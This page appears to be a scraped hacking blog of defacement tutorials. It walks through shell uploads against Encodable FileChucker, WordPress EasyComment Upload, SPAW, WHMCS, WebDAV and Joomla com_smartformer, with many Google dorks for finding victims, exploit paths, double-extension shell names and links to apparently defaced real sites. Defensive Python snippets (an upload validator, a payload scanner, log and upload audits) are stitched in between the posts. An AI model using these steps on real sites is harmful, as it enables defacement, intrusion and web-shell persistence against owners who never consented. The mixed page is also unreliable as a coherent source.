Showing posts with label TUTORIAL HACK. Show all posts

"Encodable" ~ another Deface and shell upload Vulnerability

Title : "Encodable" ~ another File upload Vulnerability
Google Dork : "intext:File Upload by Encodable" 

Let's start .. xd
Open google.com and enter this dork: "intext:File Upload by Encodable"
The search comes back with 166,000 results, but some results are fake ... they may be malware,
so pick only the real ones: you will see the title "Upload a file" in the search results :)
Click only the sites that come up with the "Upload a file" title.
After clicking the link you'll get an upload form.
You'll see some fields in this form, like name, description, email, etc.
Type anything in these boxes, but put an email in the email box; don't use your own.
Use one like billy@microsoft.com, admin@nasa.gov, etc. :P

Now choose your file and upload it :)

After you click the upload button a pop-up will open ... don't close it; it closes automatically
once the file has uploaded.

On some sites you'll get the link to your uploaded file after uploading.
If you did not find it, try these URLs:
/upload/files/
or /upload/userfiles/

Live Demo : http://150.101.230.65:8008/cgi-bin/filechucker.plx
Uploaded page : http://150.101.230.65:8008/upload/files/xd.html




Exploit WordPress uploads



Exploit WordPress  “/easy-comment-uploads/upload-form.php”


—————————————————————————-
| Title : WordPress Plugin EasyComment Upload Vulnerability
| Author: Z190T
| Date : 15/06/2011
| Dork : “/easy-comment-uploads/upload-form.php”
| Category : PHP [File Upload Vulnerability]
| Tested on: [Windows XP3, Linux Ubuntu]
—————————————————————————-



*_Exploit_*
# File Extension [.txt],[.jpg],[gif],[png],[bmp]
*_Preview_*
# site/wp-content/uploads/[years]/[month]/[yourshell]
# ex: site/wp-content/uploads/2011/06/shell.php;.txt
=========================================================
Live demo:



http://www.conversationworks.ca/wp-content/uploads/2011/06/galau.jpg
http://www.qastairs.com/wp/wp-content/uploads/2011/06/galau.jpg
http://www.10000mile.com/main/wp-content/uploads/2011/06/galau.jpg






Wordpress Exploit Easy Comment Upload



Title : Wordpress Exploit Easy Comment Upload

Dork : inurl:easy-comment-uploads/upload-form.php

POC :  /wp-content/plugins/easy-comment-uploads/upload-form.php




How to:

1. Go to Google, enter the dork in the search box, and search.

               Dork : inurl:easy-comment-uploads/upload-form.php

2. Pick a target.

3. Click the Choose File button and upload your file.

4. Not every site accepts html/php/asp, because this bug was fixed on 12/09/2011.

5. If you find a target that accepts html uploads, consider yourself lucky.

To see your uploaded file, append /wp-content/uploads/2011/10/nama_file_anda.extension (nama_file_anda = your file name)

Examples I made using .htm / .txt & .png files:

http://robbyvillegas.com/wp-content/uploads/2011/10/Muz_c0d3r.htm
http://el-bulli.net/wp-content/uploads/2011/10/Muz_c0d3r.txt
http://onigirifx.com/wp-content/uploads/2011/10/Muz_c0d3r.png



If you want to edit a website I have already uploaded a file to, use the POC.

How to:

1. http://robbyvillegas.com/wp-content/uploads/2011/10/Muz_c0d3r.htm <-- change the URL to

2. http://robbyvillegas.com/wp-content/plugins/easy-comment-uploads/upload-form.php

3. Then upload your .htm file...


Enjoy...
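
A name like `shell.php;.txt` passes any check that looks only at the text after the last dot. The following is an added example, not code from the plugin or from the original posts, showing an upload-name check that rejects that form and never reuses the client's name on disk; the image-only allowlist is an assumption about what the site needs.

```python
import re
import secrets
import unicodedata

# Assumption: the application only needs to accept these image types.
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif", "bmp"}
# Extensions a web server may execute or a browser may render as a page.
ACTIVE_EXTENSIONS = {
    "php", "php3", "php4", "php5", "phtml", "phar", "asp", "aspx", "asa",
    "cer", "jsp", "cgi", "pl", "plx", "py", "sh", "htm", "html", "shtml",
    "svg", "htaccess",
}
# Characters with no place in an upload name: path separators, the ';' used in
# names like "shell.php;.txt", control bytes (incl. NUL) and URL/shell metacharacters.
FORBIDDEN_CHARS = re.compile(r"[;/\\:%\x00-\x1f<>|\"*?]")


def _normalised(client_name):
    # NFKC folds look-alike characters (e.g. full-width ';') to their ASCII form.
    return unicodedata.normalize("NFKC", client_name).strip()


def check_upload_name(client_name):
    """Return (ok, reason). Judges the client-supplied name only."""
    name = _normalised(client_name)
    if not name or name in {".", ".."}:
        return False, "empty name"
    if FORBIDDEN_CHARS.search(name):
        return False, "forbidden character"
    parts = [p.strip().lower() for p in name.split(".")]
    if len(parts) < 2 or not parts[0]:
        return False, "no extension or dotfile"
    # Every dot-separated segment counts, not only the last one:
    # "x.php.jpg" can still reach the PHP handler on some server configurations.
    for seg in parts[1:]:
        if seg in ACTIVE_EXTENSIONS:
            return False, "active extension: " + seg
    if parts[-1] not in ALLOWED_EXTENSIONS:
        return False, "extension not allowed"
    return True, "ok"


def stored_name(client_name):
    """Name to write to disk: random base plus the validated extension."""
    ok, reason = check_upload_name(client_name)
    if not ok:
        raise ValueError(reason)
    ext = _normalised(client_name).rsplit(".", 1)[1].strip().lower()
    return secrets.token_hex(16) + "." + ext
```

A name check is only one layer: the upload directory should also be configured so the server never executes or renders what is stored there.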




Deface a Website with Spaw File Manager

Assalam and good morning!! Today admin wants to share a hack... ^_^ Since today is Admin's birthday, I feel motivated to write a new post... heheheh. OK, today admin wants to present the hack

                           SPAW FILE MANAGER - FILE UPLOAD VULNERABILITY


Let's start!!

1. Enter one of these dorks in Google search


 = inurl:Spaw2/dialogs/ 
 = Inurl:spaw2/uploads/files
 = Index of:/Spaw2/uploads/files

2. Pick a website, append the exploit to the end of the URL, and press Enter.


Exploit :/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=


Example: www.[localhost].com/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=


3. Next, it will look like this



Note :  Black box: choose Image or Files or Create Folder
        Red box: upload your deface file..
        Green box: click Upload to upload your deface file :)


4. To view your deface, look at the blue box and click it; it opens in a new tab automatically and your deface will appear ^_^


Done ^_^... hope you all enjoy it ^_^

Live Demo By Mr.Ubuntu CH/SH


Credit To  :Mr.Ubuntu CH/SH & Noentry PHC ^_^

Hack WHM with Submit Ticket Exploit


How are you, friends? It's sinchankeke, the world-famous handsome one, again. It's been a long time since we last met because I was busy watching OVJ on YouTube.. kakakakakakakak
This time sinchankeke will give a tutorial on how to hack WHMCS using the Submitticket method.

Before we get into the tutorial on hacking WHMCS using the Submitticket method, let's first prepare the materials for it.

The materials are simple enough: all you need is a script to upload your shell to the WHMCS website that will be hacked using the Submitticket method.



Here is the script:
After that, let's follow the steps of the tutorial on hacking WHMCS using the Submitticket method, as follows:

First, we try to find a WHMCS website that can be hacked using the Submitticket method with the dorks below:

 1. inurl:whmcs/cart.php?a=
2. inurl:billing/cart.php?a=

intext:Powered by WHMCompleteSolution inurl:submitticket.php
intext:Powered by WHMCompleteSolution inurl:clients/submitticket.php
intext:Powered by WHMCompleteSolution inurl:client/submitticket.php
intext:Powered by WHMCompleteSolution inurl:clientsarea/submitticket.php
intext:Powered by WHMCompleteSolution inurl:clientarea/submitticket.php
intext:Powered by WHMCompleteSolution inurl:crm/submitticket.php
intext:Powered by WHMCompleteSolution inurl:cp/submitticket.php
intext:Powered by WHMCompleteSolution inurl:manage/submitticket.php
intext:Powered by WHMCompleteSolution inurl:member/submitticket.php
intext:Powered by WHMCompleteSolution inurl:members/submitticket.php
intext:Powered by WHMCompleteSolution inurl:billing/submitticket.php
intext:Powered by WHMCompleteSolution inurl:billings/submitticket.php
intext:Powered by WHMCompleteSolution inurl:support/submitticket.php
intext:Powered by WHMCompleteSolution inurl:help/submitticket.php
intext:Powered by WHMCompleteSolution inurl:secure/submitticket.php
intext:Powered by WHMCompleteSolution inurl:store/submitticket.php
intext:Powered by WHMCompleteSolution inurl:whmcs/submitticket.php
intext:Powered by WHMCompleteSolution inurl:log/submitticket.php
intext:Powered by WHMCompleteSolution inurl:myaccount/submitticket.php
intext:Powered by WHMCompleteSolution inurl:orders/submitticket.php
intext:Powered by WHMCompleteSolution inurl:order/submitticket.php
intext:Powered by WHMCompleteSolution inurl:portal/submitticket.php
intext:Powered by WHMCompleteSolution inurl:mc/submitticket.php
intext:Powered by WHMCompleteSolution inurl:office/submitticket.php
intext:Powered by WHMCompleteSolution inurl:submitticket.php site:com
intext:Powered by WHMCompleteSolution inurl:submitticket.php site:org
intext:Powered by WHMCompleteSolution inurl:submitticket.php site:net
intext:Powered by WHMCompleteSolution inurl:submitticket.php site:info
intext:Powered by WHMCompleteSolution inurl:".*/*/submitticket.php"
intext:Powered by WHMCompleteSolution inurl:".*/submitticket.php"
*You can extend the dorks above as you wish

Once you have found a WHMCS website that can be hacked using the Submitticket method, you can follow the steps below

1. Search for a WHMCS website using the Google dorks above;
     say, for example, I found a website like this


2. Let's try entering the script I gave above for hacking WHMCS using the Submitticket method into the "Name", "Subject", and "Message" fields


3. Click Submit and check the result at http://www.[TargetWhmcsMu].com/[Path]/templates/x.php


      *If it works, the result will look like the image above

4. Once the shell is uploaded, the last step is to upload your backdoor
5. That concludes the tutorial on hacking WHMCS using the Submitticket method
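
The payload in this post is a Smarty `{php}...{/php}` block placed in the ticket's name, subject and message fields. As an added example (not WHMCS code and not from the original post), this is one way a site owner could flag such submissions and render ticket text inert before it reaches a template; the field names and the sample ticket are constructed, and HTML output is assumed.

```python
import html
import re
from urllib.parse import unquote

# Smarty 2 tags that run PHP or re-evaluate template text; spacing and case
# variations are tolerated on purpose.
CODE_TAG = re.compile(r"\{\s*/?\s*(php|include_php|eval)\b[^}]*\}", re.IGNORECASE)
# PHP calls typical of encoded payloads; a hit is a reason for review, not proof.
PHP_CALL = re.compile(r"\b(eval|base64_decode|gzinflate)\s*\(", re.IGNORECASE)

# Constructed sample submission (placeholder payload, hypothetical field names).
SAMPLE_TICKET = {
    "name": "{php}eval(base64_decode('AAAA'));{/php}",
    "subject": "%7B PHP %7Dx%7B/php%7D",
    "message": "My invoice total looks wrong, please check.",
}


def _decoded(value, rounds=3):
    """Undo URL and HTML-entity encoding a few times, so %7Bphp%7D and
    &#123;php&#125; are examined the same way as {php}."""
    for _ in range(rounds):
        nxt = html.unescape(unquote(value))
        if nxt == value:
            break
        value = nxt
    return value


def scan_ticket(fields):
    """fields: dict of form-field name -> submitted text.
    Returns a list of (field, finding) tuples; empty when nothing is flagged."""
    findings = []
    for name, raw in fields.items():
        text = _decoded(raw)
        if CODE_TAG.search(text):
            findings.append((name, "smarty-code-tag"))
        if PHP_CALL.search(text):
            findings.append((name, "php-call"))
    return findings


def neutralise(value):
    """Escape for HTML and turn braces into entities, so the text can be shown
    to staff but can never be parsed as a template tag."""
    return html.escape(value).replace("{", "&#123;").replace("}", "&#125;")
```

Filtering input is a stopgap; the durable fix is a patched WHMCS release in which ticket content is never evaluated as template source.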

Deface With Webdav

Create the deface file that will be uploaded later:

Steps:

Example deface: http://graniteliquidators.com/ch.html

1. Open: http://graniteliquidators.com/ch.html
2. Then press Ctrl+U; a new tab will open,
3. Copy all of that code,
4. Open Notepad and paste the code; you can change Cyber Hacker CH to your own name if you like,
5. When done, use Save As; the name must end in .html, for example: cyberhacker.html
    and set Save as type to: All Files
6. All that's left is to upload it XP

  




Assalamualaikum... in this entry I want to teach you how to deface using WebDav by Hmei7. For your information, with this WebDav deface you can plant a shell. All right... let's start...

Download Files :

You need to download the files first:

Download : Rootkit

Password  : cbf

Download : Shell

Note: you must turn off your antivirus. Otherwise the antivirus will detect the rootkit as a virus.

How to use it:

1. Open the rootkit tool. It will look like the image below:

2. Click WebDav, then click Asp shell maker as in the image above. After that it will look like the image below:

3. Click setting... it will look like the image below:

4. Once that appears, rename Hmei7 to any name you like. Remember, change only Hmei7... do not change the .asp;.txt part at all.

5. Then you need to Load shell from file, as in the image below:


6. Find your shell. Make sure you have extracted it first.
Your shell's name must end like this ---> .asp;.jpg
Then click Open.


7. After that, click Add site, as in the image below:

8. Enter the URL you want to target... then click Serang (Attack)!!

Once it attacks, it will look like the image below...
It will show: Checking : http://www.apa2.com. When finished, it will look like the image below:


Now copy the shell link it gives you, paste it into your browser's address bar and press Enter!

Note: if it succeeds, it will show "shell created!". If not, it will show "web not vuln dav".


How to upload the deface file:

1. After you paste it and press Enter, the shell page will appear. Find the word UPLOAD and click it. Choose your deface file and click Upload. Example file: apa2.html

2. Finally, enjoy your deface!
To view your deface:
www.apa2.com/apa2.html <--- your deface file.


DONE!!!




How to replace the main page:


You can also replace the website's main page.
Steps:
1. Scroll down and find the file index.asp,
2. Rename that file to another name, e.g. indexori.asp
3. Rename your file to index.asp.
4. Now open the website and enjoy your deface.
Example: www.apa2.com

5. If it does not work, index.asp is not the file that holds the website's main page. It may instead be:

index.html/index.htm/default.html/default.htm/default.asp/


Done!!!






Some vuln sites:
show your skills,


Google Dork for WebDav :

inurl:.org/*.asp 
inurl:.us/*.asp 
inurl:.gov.com/*.asp 
inurl:.gov.il/*.asp 
inurl:.co.il/*.asp
inurl:.ah.cn/*.asp
inurl:.bj.cn/*.asp
inurl:.cq.cn/*.asp
inurl:.fj.cn/*.asp
inurl:.gd.cn/*.asp
inurl:.gs.cn/*.asp
inurl:.gz.cn/*.asp
inurl:.gx.cn/*.asp
inurl:.ha.cn/*.asp
inurl:.hb.cn/*.asp
inurl:.he.cn/*.asp
inurl:.hi.cn/*.asp
inurl:.hl.cn/*.asp
inurl:.hn.cn/*.asp
inurl:.jl.cn/*.asp
inurl:.js.cn/*.asp
inurl:.jx.cn/*.asp
inurl:.ln.cn/*.asp
inurl:.nm.cn/*.asp
inurl:.nx.cn/*.asp
inurl:.qh.cn/*.asp
inurl:.sc.cn/*.asp
inurl:.sd.cn/*.asp
inurl:.sh.cn/*.asp
inurl:.sn.cn/*.asp
inurl:.sx.cn/*.asp
inurl:.tj.cn/*.asp
inurl:.tw.cn/*.asp
inurl:.xj.cn/*.asp
inurl:.xz.cn/*.asp
inurl:.yn.cn/*.asp
inurl:.zj.cn/*.asp
inurl:.ac.cn/*.asp
inurl:.com.cn/*.asp
inurl:.edu.cn/*.asp
inurl:.gov.cn/*.asp
inurl:.net.cn/*.asp
inurl:.org.cn/*.asp


CREDIT : REAPERZHACKING ( Afif )
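
The WebDAV post leaves two traces in a web server's logs: write-type WebDAV methods from an outside client, and requests for names where a script extension is followed by `;` (the `.asp;.txt` and `.asp;.jpg` forms above). This added example, which is not part of the original post or of any tool it mentions, scans an access log for both; it assumes IIS W3C extended logs with the fields shown, and the sample lines are constructed.

```python
import re

# WebDAV / HTTP methods that create or change content on the server.
WRITE_METHODS = {"PUT", "MOVE", "COPY", "MKCOL", "PROPPATCH", "DELETE"}
# A script extension followed by ';', as in "<name>.asp;.txt".
SEMICOLON_NAME = re.compile(r"\.(asp|asa|cer|aspx|php)\s*;", re.IGNORECASE)

# Constructed sample log (documentation IP ranges, made-up file names).
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem c-ip sc-status
2011-10-02 03:11:40 GET /index.asp 198.51.100.7 200
2011-10-02 03:12:01 OPTIONS / 203.0.113.9 200
2011-10-02 03:12:02 PUT /sample.txt 203.0.113.9 201
2011-10-02 03:12:09 GET /sample.asp;.txt 203.0.113.9 200
2011-10-02 03:15:30 PUT /probe.txt 192.0.2.44 403
"""


def parse_w3c(text):
    """Yield one dict per request, keyed by the names in the #Fields header."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            values = line.split()
            if len(values) == len(fields):  # skip truncated or malformed rows
                yield dict(zip(fields, values))


def webdav_findings(text):
    """Return {client_ip: sorted list of findings} for clients worth a look."""
    out = {}
    for r in parse_w3c(text):
        method, status = r["cs-method"].upper(), r["sc-status"]
        stem, ip = r["cs-uri-stem"], r["c-ip"]
        if method in WRITE_METHODS:
            kind = "write-accepted" if status.startswith("2") else "write-refused"
            out.setdefault(ip, set()).add(kind + ":" + method)
        if SEMICOLON_NAME.search(stem):
            kind = "script-name-served" if status == "200" else "script-name-probed"
            out.setdefault(ip, set()).add(kind)
    return {ip: sorted(found) for ip, found in out.items()}
```

Any `write-accepted` finding from an unauthenticated client means WebDAV publishing is open on that site and should be disabled or put behind authentication.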

JOOMLA COMPONENT COM_SMARTFORMER SHELL UPLOAD VULNERABILITY

Assalamualaikum, today I want to share another Joomla exploit. With this exploit you can upload a shell. OK, let's start.

1. Google dork :

inurl:"index.php?option=com_smartformer"

2. Pick one of the targets and it will look like the example in the image below:


Fill in the details as in the image.
Then SUBMIT.


It will look more or less like the image below:


OK, if it looks like this, it means your shell is in. But if it doesn't, for example it says "File rejected", "file contain virus", etc., it means you cannot upload a shell.

3. To see the result:

http://target.com/components/com_smartformer/files/SHELL.php

target.com = replace with the URL of the website you found; replace SHELL.php with the name of your shell.

Note: some websites allow the upload but show "not found" when you open the shell. That means the website stores the shell in another directory. You will have to find it yourself.

DONE!

Live Demo :

http://www.northendthrift.com/index.php?option=com_smartformer&Itemid=3

Result :
http://www.northendthrift.com/components/com_smartformer/files/hello.html



cc:Reaperz
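
Every post on this page ends with a file sitting in a predictable upload directory (Encodable's `/upload/files/`, WordPress `wp-content/uploads`, `spaw2/uploads`, `com_smartformer/files`). The following added example, not taken from the posts, is a clean-up audit a site owner can run over a document root to list files in those directories that are scripts or pages, by name or by content; the marker list is an assumption and hits need manual review.

```python
import os
import re

# Upload locations named in the posts on this page; matched anywhere in the path
# because the posts show them under prefixes such as /admin/ or /wp/.
UPLOAD_DIRS = ("upload/files", "upload/userfiles", "wp-content/uploads",
               "spaw2/uploads", "components/com_smartformer/files")
ACTIVE_NAME = re.compile(
    r"\.(php\d?|phtml|phar|asp|aspx|asa|cer|jsp|cgi|pl|plx|s?html?)(\.|$)", re.I)
# Leading bytes that mark server-side code or a complete page in a "harmless" file.
MARKERS = (b"<?php", b"<%", b"<html", b"<script", b"{php}")


def in_upload_dir(rel_folder):
    padded = "/" + rel_folder.strip("/") + "/"
    return any("/" + d + "/" in padded for d in UPLOAD_DIRS)


def audit_uploads(docroot, head_bytes=4096):
    """Return sorted (relative_path, reason) pairs for files that do not belong
    in an upload directory. Only the first head_bytes of each file are read."""
    hits = []
    for folder, _dirs, files in os.walk(docroot):
        rel_folder = os.path.relpath(folder, docroot).replace(os.sep, "/")
        if not in_upload_dir(rel_folder):
            continue
        for fname in files:
            rel = rel_folder + "/" + fname
            if ";" in fname:
                hits.append((rel, "semicolon in name"))
            elif ACTIVE_NAME.search(fname):
                hits.append((rel, "active extension"))
            else:
                try:
                    with open(os.path.join(folder, fname), "rb") as fh:
                        head = fh.read(head_bytes).lower()
                except OSError:
                    continue  # unreadable file: skip, do not abort the audit
                if any(m in head for m in MARKERS):
                    hits.append((rel, "active content in data file"))
    return sorted(hits)
```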